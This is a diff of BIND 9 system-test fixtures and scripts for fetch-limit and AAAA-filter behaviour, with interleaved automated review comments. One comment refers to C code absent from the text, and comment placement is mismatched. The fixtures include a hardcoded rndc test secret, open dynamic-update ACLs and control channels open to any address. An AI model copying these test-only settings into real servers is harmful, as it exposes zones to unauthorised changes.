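Review bot: In the `--gethostname` branch of `main` the buffer is printed with `%s` directly after `gethostname(hostname, sizeof(hostname))`, and POSIX leaves it unspecified whether a truncated name is NUL-terminated. Adding `hostname[sizeof(hostname) - 1] = '\0';` after the `n == -1` check makes the `fprintf` safe regardless of the platform's behaviour. On WIN32 the error return in the same branch also leaves without `WSACleanup()`, which is harmless for a one-shot probe but is worth a short comment so it is not copied into long-running code.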
@@ -0,0 +1,86 @@
+#!/usr/bin/perl -w
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+#
+# Don't respond if the "norespond" file exists; otherwise respond to
+# any A or AAAA query.
+#
+
+use IO::File;
+use IO::Socket;
+use Net::DNS;
+use Net::DNS::Packet;
+
+my $localport = int($ENV{'PORT'});
+if (!$localport) { $localport = 5300; }
+
+my $sock = IO::Socket::INET->new(LocalAddr => "10.53.0.4",
+ LocalPort => $localport, Proto => "udp") or die "$!";
+
+my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!";
+print $pidf "$$\n" or die "cannot write pid file: $!";
+$pidf->close or die "cannot close pid file: $!";
+sub rmpid { unlink "ans.pid"; exit 1; };
+
+$SIG{INT} = \&rmpid;
+$SIG{TERM} = \&rmpid;
+
+for (;;) {
+ $sock->recv($buf, 512);
+
+ print "**** request from " , $sock->peerhost, " port ", $sock->peerport, "\n";
+
+ my $packet;
+
+ if ($Net::DNS::VERSION > 0.68) {
+ $packet = new Net::DNS::Packet(\$buf, 0);
+ $@ and die $@;
+ } else {
+ my $err;
+ ($packet, $err) = new Net::DNS::Packet(\$buf, 0);
+ $err and die $err;
+ }
+
+ print "REQUEST:\n";
+ $packet->print;
+
+ $packet->header->qr(1);
+
+ my @questions = $packet->question;
+ my $qname = $questions[0]->qname;
+ my $qtype = $questions[0]->qtype;
+
+ my $donotrespond = 0;
+
+ if (-e 'norespond') {
+ $donotrespond = 1;
+ } else {
+ $packet->header->aa(1);
+ if ($qtype eq "A") {
+ $packet->push("answer",
+ new Net::DNS::RR($qname .
+ " 300 A 192.0.2.1"));
+ } elsif ($qtype eq "AAAA") {
+ $packet->push("answer",
+ new Net::DNS::RR($qname .
+ " 300 AAAA 2001:db8:beef::1"));
+ }
+ }
+
+ if ($donotrespond == 0) {
+ $sock->send($packet->data);
+ print "RESPONSE:\n";
+ $packet->print;
+ print "\n";
+ }
+}
diff --git a/bin/tests/system/fetchlimit/clean.sh b/bin/tests/system/fetchlimit/clean.sh
new file mode 100644
index 0000000..f0158b1
--- /dev/null
+++ b/bin/tests/system/fetchlimit/clean.sh
@@ -0,0 +1,19 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f */named.conf */named.memstats */ans.run */named.recursing */named.run
+rm -f dig.out*
+rm -f ans4/norespond
+rm -f ns3/named.stats ns3/named_dump.db
+rm -f burst.input.*
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/fetchlimit/ns1/named.conf.in b/bin/tests/system/fetchlimit/ns1/named.conf.in
new file mode 100644
index 0000000..9725d01
--- /dev/null
+++ b/bin/tests/system/fetchlimit/ns1/named.conf.in
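Review bot: `$questions[0]->qname` in ans.pl is dereferenced without checking that the received packet carried a question, and a packet that fails to parse goes straight to `die`. Either way one stray or malformed datagram on 10.53.0.4 ends the responder, after which the fetch-limit checks would be measuring a dead server rather than a deliberately silent one. Inside the `for (;;)` loop, `next unless @questions;` before the `qname` line would skip such packets, and the two `die` calls on parse failure could log and `next` in the same way. `$buf` is also never declared; `my $buf;` before the `recv` call would let the script run under `use strict`.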
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+ notify yes;
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
+
+zone "example.info." {
+ type primary;
+ file "example-info.db";
+};
diff --git a/bin/tests/system/fetchlimit/ns1/root.db b/bin/tests/system/fetchlimit/ns1/root.db
new file mode 100644
index 0000000..17780d1
--- /dev/null
+++ b/bin/tests/system/fetchlimit/ns1/root.db
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA gson.nominum.com. a.root.servers.nil. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
diff --git a/bin/tests/system/fetchlimit/ns2/example.db b/bin/tests/system/fetchlimit/ns2/example.db
new file mode 100644
index 0000000..5bf9999
--- /dev/null
+++ b/bin/tests/system/fetchlimit/ns2/example.db
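Review bot: The `zone "example.info."` block points at `file "example-info.db";`, but the only files this diff adds under fetchlimit/ns1 are named.conf.in and root.db, and root.db carries no delegation for example.info. Unless the zone file is generated by a script outside this view, named would fail to load that zone at startup and answer for it with an error. If nothing in the test queries example.info, removing the four-line zone block keeps the fixture honest; otherwise the zone file should be added alongside root.db.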
@@ -0,0 +1,37 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN .
+$TTL 300 ; 5 minutes
+example IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+example NS ns2.example.
+ns2.example. A 10.53.0.2
+
+a.example. A 10.0.0.1
+ MX 10 mail.example.
+
+mail.example. A 10.0.0.2
+
+lamesub.example. NS ns4.example.
+ns4.example. A 10.53.0.4
+
+0.example. A 10.53.1.0
+1.example. A 10.53.1.1
+2.example. A 10.53.1.2
+3.example. A 10.53.1.3
+4.example. A 10.53.1.4
+5.example. A 10.53.1.5
diff --git a/bin/tests/system/fetchlimit/ns2/named.conf.in b/bin/tests/system/fetchlimit/ns2/named.conf.in
new file mode 100644
index 0000000..108877e
--- /dev/null
+++ b/bin/tests/system/fetchlimit/ns2/named.conf.in
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+ notify yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+
+zone "example" {
+ type primary;
+ file "example.db";
+ allow-update { any; };
+};
diff --git a/bin/tests/system/fetchlimit/ns3/named.args b/bin/tests/system/fetchlimit/ns3/named.args
new file mode 100644
index 0000000..6bd3e6c
--- /dev/null
+++ b/bin/tests/system/fetchlimit/ns3/named.args
@@ -0,0 +1 @@
+-m record,size,mctx -c named.conf -d 1 -D fetchlimit-ns3 -X named.lock -g -T maxcachesize=2097152
diff --git a/bin/tests/system/fetchlimit/ns3/named1.conf.in b/bin/tests/system/fetchlimit/ns3/named1.conf.in
new file mode 100644
index 0000000..3adfe47
--- /dev/null
+++ b/bin/tests/system/fetchlimit/ns3/named1.conf.in
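Review bot: `allow-update { any; };` on zone "example" in ns2/named.conf.in lets every client that can reach 10.53.0.2 rewrite the zone without a key, and nothing in the fetchlimit files visible here sends a dynamic update (tests.sh is only partly in view, so this is an inference). If the test never updates the zone, dropping the line returns the zone to named's default of refusing updates and keeps the fixture from teaching an unsafe pattern. If updates are needed, restricting the ACL to the test client, or adding a one-line comment saying the open ACL is deliberate and test-only, would make the intent explicit.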
@@ -0,0 +1,47 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+controls { /* empty */ };
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ directory ".";
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ notify yes;
+ fetches-per-server 400;
+};
+
+server 10.53.0.4 {
+ edns no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "root.hint";
+};
diff --git a/bin/tests/system/fetchlimit/ns3/named2.conf.in b/bin/tests/system/fetchlimit/ns3/named2.conf.in
new file mode 100644
index 0000000..74374b1
--- /dev/null
+++ b/bin/tests/system/fetchlimit/ns3/named2.conf.in
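Review bot: ns3/named1.conf.in declares `controls` twice: `controls { /* empty */ };` at the top and the `inet 10.53.0.3 port @CONTROLPORT@ ...` block further down, whereas named2.conf.in and named3.conf.in carry only the latter. The empty statement reads as "control channel disabled", which contradicts the listener configured later and makes it unclear which one a reader should trust. Since tests.sh drives this server through rndc on 10.53.0.3, removing the `controls { /* empty */ };` line would bring the file in line with its two siblings.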
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ directory ".";
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ notify yes;
+ fetches-per-zone 40;
+};
+
+server 10.53.0.4 {
+ edns no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "root.hint";
+};
diff --git a/bin/tests/system/fetchlimit/ns3/named3.conf.in b/bin/tests/system/fetchlimit/ns3/named3.conf.in
new file mode 100644
index 0000000..3df353b
--- /dev/null
+++ b/bin/tests/system/fetchlimit/ns3/named3.conf.in
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ directory ".";
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ notify yes;
+ recursive-clients 400;
+};
+
+server 10.53.0.4 {
+ edns no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "root.hint";
+};
diff --git a/bin/tests/system/fetchlimit/ns3/root.hint b/bin/tests/system/fetchlimit/ns3/root.hint
new file mode 100644
index 0000000..e0f186c
--- /dev/null
+++ b/bin/tests/system/fetchlimit/ns3/root.hint
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 999999
+. IN NS a.root-servers.nil.
+a.root-servers.nil. IN A 10.53.0.1
diff --git a/bin/tests/system/fetchlimit/prereq.sh b/bin/tests/system/fetchlimit/prereq.sh
new file mode 100644
index 0000000..ec369f8
--- /dev/null
+++ b/bin/tests/system/fetchlimit/prereq.sh
@@ -0,0 +1,23 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+if $PERL -e 'use Net::DNS;' 2>/dev/null
+then
+ :
+else
+ echo_i "This test requires the Net::DNS library." >&2
+ exit 1
+fi
diff --git a/bin/tests/system/fetchlimit/setup.sh b/bin/tests/system/fetchlimit/setup.sh
new file mode 100644
index 0000000..7f5cbe7
--- /dev/null
+++ b/bin/tests/system/fetchlimit/setup.sh
@@ -0,0 +1,19 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named1.conf.in ns3/named.conf
diff --git a/bin/tests/system/fetchlimit/tests.sh b/bin/tests/system/fetchlimit/tests.sh
new file mode 100644
index 0000000..55f4bf6
--- /dev/null
+++ b/bin/tests/system/fetchlimit/tests.sh
@@ -0,0 +1,200 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+DIGCMD="$DIG @10.53.0.3 -p ${PORT} +tcp +tries=1 +time=1"
+RNDCCMD="$RNDC -p ${CONTROLPORT} -s 10.53.0.3 -c ../common/rndc.conf"
+
+burst() {
+ num=${3:-20}
+ rm -f burst.input.$$
+ while [ $num -gt 0 ]; do
+ num=$((num-1))
+ echo "${num}${1}${2}.lamesub.example A" >> burst.input.$$
+ done
+ $PERL ../ditch.pl -p ${PORT} -s 10.53.0.3 burst.input.$$
+ rm -f burst.input.$$
+}
+
+stat() {
+ clients=`$RNDCCMD status | grep "recursive clients" |
+ sed 's;.*: \([^/][^/]*\)/.*;\1;'`
+ echo_i "clients: $clients"
+ [ "$clients" = "" ] && return 1
+ [ "$clients" -ge $1 ] || return 1
+ [ "$clients" -le $2 ] || return 1
+ return 0
+}
+
+status=0
+
+echo_i "checking recursing clients are dropped at the per-server limit"
+ret=0
+# make the server lame and restart
+$RNDCCMD flush
+touch ans4/norespond
+for try in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20; do
+ burst a $try
+ # fetches-per-server is at 400, but at 20qps against a lame server,
+ # we'll reach 200 at the tenth second, and the quota should have been
+ # tuned to less than that by then.
+ [ $try -le 5 ] && low=$((try*10)) + stat 20 200 || ret=1 + [ $ret -eq 1 ] && break + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "dumping ADB data" +$RNDCCMD dumpdb -adb +info=`grep '10.53.0.4' ns3/named_dump.db | sed 's/.*\(atr [.0-9]*\).*\(quota [0-9]*\).*/\1 \2/'` +echo_i $info +set -- $info +quota=$5 +[ ${5:-200} -lt 200 ] || ret=1 + +echo_i "checking servfail statistics" +ret=0 +rm -f ns3/named.stats +$RNDCCMD stats +for try in 1 2 3 4 5; do + [ -f ns3/named.stats ] && break + sleep 1 +done +sspill=`grep 'spilled due to server' ns3/named.stats | sed 's/\([0-9][0-9]*\) spilled.*/\1/'` +[ -z "$sspill" ] && sspill=0 +fails=`grep 'queries resulted in SERVFAIL' ns3/named.stats | sed 's/\([0-9][0-9]*\) queries.*/\1/'` +[ -z "$fails" ] && fails=0 +[ "$fails" -ge "$sspill" ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking lame server recovery" +ret=0 +rm -f ans4/norespond +for try in 1 2 3 4 5; do + burst b $try + stat 0 200 || ret=1 + [ $ret -eq 1 ] && break + sleep 1 +done + +echo_i "dumping ADB data" +$RNDCCMD dumpdb -adb +info=`grep '10.53.0.4' ns3/named_dump.db | sed 's/.*\(atr [.0-9]*\).*\(quota [0-9]*\).*/\1 \2/'` +echo_i $info +set -- $info +[ ${5:-${quota}} -lt $quota ] || ret=1 +quota=$5 + +for try in 1 2 3 4 5 6 7 8 9 10; do + burst c $try + stat 0 20 || ret=1 + [ $ret -eq 1 ] && break + sleep 1 +done + +echo_i "dumping ADB data" +$RNDCCMD dumpdb -adb +info=`grep '10.53.0.4' ns3/named_dump.db | sed 's/.*\(atr [.0-9]*\).*\(quota [0-9]*\).*/\1 \2/'` +echo_i $info +set -- $info +[ ${5:-${quota}} -gt $quota ] || ret=1 +quota=$5 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +copy_setports ns3/named2.conf.in ns3/named.conf +rndc_reconfig ns3 10.53.0.3 + +echo_i "checking lame server clients are dropped at the per-domain limit" +ret=0 +fail=0 +success=0 +touch ans4/norespond +for try in 1 2 3 4 5; do + burst b $try 300 + $DIGCMD a 
${try}.example > dig.out.ns3.$try + grep "status: NOERROR" dig.out.ns3.$try > /dev/null 2>&1 && \ + success=$((success+1)) + grep "status: SERVFAIL" dig.out.ns3.$try > /dev/null 2>&1 && \ + fail=$(($fail+1)) + stat 30 50 || ret=1 + [ $ret -eq 1 ] && break + $RNDCCMD recursing 2>&1 | sed 's/^/ns3 /' | cat_i + sleep 1 +done +echo_i "$success successful valid queries, $fail SERVFAIL" +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking drop statistics" +rm -f ns3/named.stats +$RNDCCMD stats +for try in 1 2 3 4 5; do + [ -f ns3/named.stats ] && break + sleep 1 +done +zspill=`grep 'spilled due to zone' ns3/named.stats | sed 's/\([0-9][0-9]*\) spilled.*/\1/'` +[ -z "$zspill" ] && zspill=0 +drops=`grep 'queries dropped' ns3/named.stats | sed 's/\([0-9][0-9]*\) queries.*/\1/'` +[ -z "$drops" ] && drops=0 +[ "$drops" -ge "$zspill" ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +copy_setports ns3/named3.conf.in ns3/named.conf +rndc_reconfig ns3 10.53.0.3 + +echo_i "checking lame server clients are dropped below the hard limit" +ret=0 +fail=0 +exceeded=0 +success=0 +touch ans4/norespond +for try in 1 2 3 4 5; do + burst b $try 400 + $DIGCMD +time=2 a ${try}.example > dig.out.ns3.$try + stat 100 400 || exceeded=$((exceeded + 1)) + grep "status: NOERROR" dig.out.ns3.$try > /dev/null 2>&1 && \ + success=$((success+1)) + grep "status: SERVFAIL" dig.out.ns3.$try > /dev/null 2>&1 && \ + fail=$(($fail+1)) + sleep 1 +done +echo_i "$success successful valid queries (expected 5)" +[ "$success" -eq 5 ] || { echo_i "failed"; ret=1; } +echo_i "$fail SERVFAIL responses (expected 0)" +[ "$fail" -eq 0 ] || { echo_i "failed"; ret=1; } +echo_i "clients count exceeded 400 on $exceeded trials (expected 0)" +[ "$exceeded" -eq 0 ] || { echo_i "failed"; ret=1; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking drop statistics" +rm -f ns3/named.stats +$RNDCCMD stats +for try in 1 2 3 4 5; do + 
[ -f ns3/named.stats ] && break + sleep 1 +done +drops=`grep 'queries dropped due to recursive client limit' ns3/named.stats | sed 's/\([0-9][0-9]*\) queries.*/\1/'` +[ "${drops:-0}" -ne 0 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/filter-aaaa/clean.sh b/bin/tests/system/filter-aaaa/clean.sh new file mode 100644 index 0000000..b7a2372 --- /dev/null +++ b/bin/tests/system/filter-aaaa/clean.sh @@ -0,0 +1,33 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns1/K* +rm -f ns1/*.signed +rm -f ns1/signer.err +rm -f ns1/dsset-* + +rm -f */named.run +rm -f */named.conf +rm -f */named.memstats + +rm -f ns4/K* +rm -f ns4/*.signed +rm -f ns4/signer.err +rm -f ns4/dsset-* + +rm -f dig.out.* +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* + +rm -f ns*/trusted.conf +rm -f ns*/keygen.out diff --git a/bin/tests/system/filter-aaaa/conf/bad1.conf b/bin/tests/system/filter-aaaa/conf/bad1.conf new file mode 100644 index 0000000..01613fd --- /dev/null +++ b/bin/tests/system/filter-aaaa/conf/bad1.conf 
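Review bot: The quota assertion after the first `dumping ADB data` step in fetchlimit/tests.sh is discarded: `[ ${5:-200} -lt 200 ] || ret=1` runs after `status=$((status+ret))` has already been taken, and the next section opens with `ret=0`, so a per-server quota that was never tuned down cannot fail the run. Moving `status=$((status+ret))` (and the `failed` message) below that check would make it count. In the same first loop `low=$((try*10))` is computed but `stat 20 200` ignores it, and both `checking drop statistics` sections start without `ret=0`, so an earlier failure is added to `status` a second time. This script is the regression guard for the fetch-limit resource-exhaustion controls, so a check that cannot fail is worth fixing.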
@@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +plugin query "../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 yes; + filter-aaaa { none; }; +}; diff --git a/bin/tests/system/filter-aaaa/conf/bad2.conf b/bin/tests/system/filter-aaaa/conf/bad2.conf new file mode 100644 index 0000000..e7a2d28 --- /dev/null +++ b/bin/tests/system/filter-aaaa/conf/bad2.conf @@ -0,0 +1,26 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +plugin query "../../../plugins/lib/filter-aaaa.so" { + /* + * While this matches the defaults, it is not a good configuration + * to have in named.conf as the two options contradict each other + * indicating a error on behalf of the operator. + * + * The default is to have filter-aaaa-on-v4 off, but if it is turned + * on then it applies to all IPv4 queries. This results in + * contradictory defaults. + */ + filter-aaaa-on-v4 no; + filter-aaaa { any; }; +}; diff --git a/bin/tests/system/filter-aaaa/conf/bad3.conf b/bin/tests/system/filter-aaaa/conf/bad3.conf new file mode 100644 index 0000000..88b4c7c --- /dev/null +++ b/bin/tests/system/filter-aaaa/conf/bad3.conf 
@@ -0,0 +1,19 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view myview { + plugin query "../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 no; + filter-aaaa { any; }; + }; +}; diff --git a/bin/tests/system/filter-aaaa/conf/bad4.conf b/bin/tests/system/filter-aaaa/conf/bad4.conf new file mode 100644 index 0000000..a65b367 --- /dev/null +++ b/bin/tests/system/filter-aaaa/conf/bad4.conf @@ -0,0 +1,19 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view myview { + plugin query "../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 yes; + filter-aaaa { none; }; + }; +}; diff --git a/bin/tests/system/filter-aaaa/conf/bad5.conf b/bin/tests/system/filter-aaaa/conf/bad5.conf new file mode 100644 index 0000000..e26564b --- /dev/null +++ b/bin/tests/system/filter-aaaa/conf/bad5.conf 
@@ -0,0 +1,21 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +plugin query "../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 yes; + filter-aaaa { 1.0.0.0/8; }; +}; + +view myview { + match-clients { any; }; +}; diff --git a/bin/tests/system/filter-aaaa/conf/good1.conf b/bin/tests/system/filter-aaaa/conf/good1.conf new file mode 100644 index 0000000..9203a13 --- /dev/null +++ b/bin/tests/system/filter-aaaa/conf/good1.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +plugin query "../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 yes; +}; diff --git a/bin/tests/system/filter-aaaa/conf/good2.conf b/bin/tests/system/filter-aaaa/conf/good2.conf new file mode 100644 index 0000000..b6159b1 --- /dev/null +++ b/bin/tests/system/filter-aaaa/conf/good2.conf 
